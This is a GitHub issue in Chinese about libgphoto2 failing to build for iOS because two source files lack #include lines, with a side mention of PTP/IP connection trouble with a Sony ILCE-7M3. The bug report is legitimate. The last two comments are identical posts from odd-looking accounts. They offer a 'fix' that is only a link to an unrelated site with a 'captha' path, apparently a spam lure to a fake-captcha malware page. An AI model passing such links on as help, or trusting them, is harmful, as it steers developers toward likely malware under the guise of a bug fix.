gphoto/libgphoto2 #1092: 构建用于IOS系统手机应用的代码时有一些头文件没有正确引入

ArvinSpace, 2025-02-24:
**Describe the bug**

这一行的上面应该添加代码`#include "config.h"`，不然构建用于IOS系统手机应用的代码时会报错：`HAVE_LIMITS_H`未定义
https://github.com/gphoto/libgphoto2/blob/017c24dc1f61e753a166ab081b9ed69cc60b140d/camlibs/ptp2/ptp-pack.c#L27

##

这一行的上面应该添加代码`#include <gphoto2/gphoto2-port-library.h>`，不然构建用于IOS系统手机应用的代码时会报错：调用未声明的函数`gp_port_library_list`
https://github.com/gphoto/libgphoto2/blob/017c24dc1f61e753a166ab081b9ed69cc60b140d/libgphoto2/gphoto2-camera.c#L28

**Name the camera**
Sony ILCE-7M3(PTP/IP Camera)

**libgphoto2 and gphoto2 version**
libgphoto2: 2.5.31
电脑是MacOS系统
手机是IOS系统

**To Reproduce**
我是在开发用于IOS系统的手机应用，准备使用PTP/IP协议连接照相机，但是连接未成功，不知道是什么原因，因为不能做完整的测试，所以没有提交Pull requests，现在在这里记录一下看看是否需要解决

DomesticFemBoy, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)

Domestos2281337, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)